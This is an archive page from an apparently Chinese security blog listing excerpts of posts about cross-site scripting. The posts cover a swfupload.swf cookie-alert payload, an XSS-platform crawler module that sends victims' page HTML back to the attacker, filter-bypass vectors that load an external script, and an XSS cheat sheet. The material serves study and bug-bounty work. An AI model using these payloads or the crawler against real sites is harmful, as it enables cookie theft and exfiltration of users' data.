xss – 蜗居

swfupload.swf xss漏洞说明

朋友今天丢来一个网址，然后问我能不能弹窗，地址是： www.xxxx.com/swf/swfupload.swf?movieName="])}catch(e){if(!window.x){window.x=1;alert(document.cookie)}}// 一看这个文件，很是熟悉啊，记得，好像有哪个CMS用过这个文件，然后习惯性chrome访问回车，然后，诶？？？居然是下载这个文件。。。然后听朋友说，最新的火狐不会弹窗？，，，不过还好我的是老版本的，...

2018年07月02日学习笔记暂无评论喜欢 0 阅读 2,936 views 次阅读全文

XSS平台爬虫模块 (神器)

简单说一下【XSS平台爬虫模块】原理：当对方中招XSS代码时，会自动获取当前页面的html源码，同时获取源码中所有的超链接，然后自动一个链接一个链接的访问，获取这个链接对应的html源码回传至XSS平台，这样可以进一步渗透分析网站功能。使用方法：在配置项目模块代码时，请仅勾选这两个模块，且必须勾选【超强默认模块】！！！此插件不需要任何设置，除此之外不要勾...

2018年05月23日学习笔记评论 2 条喜欢 3 阅读 5,963 views 次阅读全文

Uber Bug Bounty: Turning Self-XSS into Good-XSS

Now that the Uber bug bounty programme has launched publicly, I can publish some of my favourite submissions, which I’ve been itching to do over the past year. This is part one of maybe two or three posts. On Uber’s Partners portal, where Drivers can login and update their details, I found a very simple, classic XSS: changing the value of one of...

2017年10月22日汪洋大海暂无评论喜欢 0 阅读 2,580 views 次阅读全文

XSS挑战赛的xss知识点及答案

M师傅语录: 题目很多围绕着security header来出题，希望开发者重视这些问题，在防御上，正确的设置下面的值，是能够避免很多问题. content-type、x-xss-protection、x-frame-options、x-content-type-options 1. 文件上传 <?php header("X-XSS-Protection: 0"); $target_dir = "uploads/"; $target_file = $target_dir . basename($_FILES[&...

2017年08月31日汪洋大海暂无评论喜欢 1 阅读 3,540 views 次阅读全文

密码保护：基于位置的有效XSS攻击代码

在研究的方式来逃避过滤，检测并阻止在有效载荷中的圆括号存在XSS的尝试，我来到这，将共享这一岗位及其随后的部分问题的有趣的解决方案。值得注意的是，对被禁止字符的任何编码都不会回避过滤器。为了实现这一点，我开始使用JavaScript文档位置属性，它使下面的原始有效负载成为可能，但还没有准备好逃避： 1 <svg/onload=location='javascript:alert(1)'><svg...

2017年06月22日汪洋大海要查看留言请输入您的密码。喜欢 0 阅读 1,609 views 次阅读全文

密码保护：超强绕过XSS的方法

如XSSer（一个让XSS）可能知道，脚本标签并不总是能注入一个XSS漏洞是因为它将由开发商或一个WAF过滤后的第一件事（Web应用防火墙）。此外，输入可能仅限于几个字符，这使得在事件处理程序中不可能放置调用外部脚本所需的下列JavaScript代码，例如: 1 with(document)body.appendChild(createElement('script')).src='//DOMAIN'with(document)body.appendChild(createElemen...

2017年06月22日汪洋大海要查看留言请输入您的密码。喜欢 1 阅读 1,883 views 次阅读全文

弹窗小姿势锦集

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 <script>prompt(1)</script...

2017年06月22日汪洋大海暂无评论喜欢 0 阅读 2,426 views 次阅读全文

XSS Cheat Sheet

本文有一个重点需要GET到。 Technique Vector/Payload * * In URLs: & => %26 , # => %23 , + => %2B HTML Context Tag Injection <svg onload=alert(1)> "><svg onload=alert(1)// HTML Context Inline Injection "onmouseover=alert(1)// "autofocus/onfocus=alert(1)// Javascript Context Code Injection '-alert(1)-' '-...

2017年06月20日汪洋大海暂无评论喜欢 0 阅读 2,438 views 次阅读全文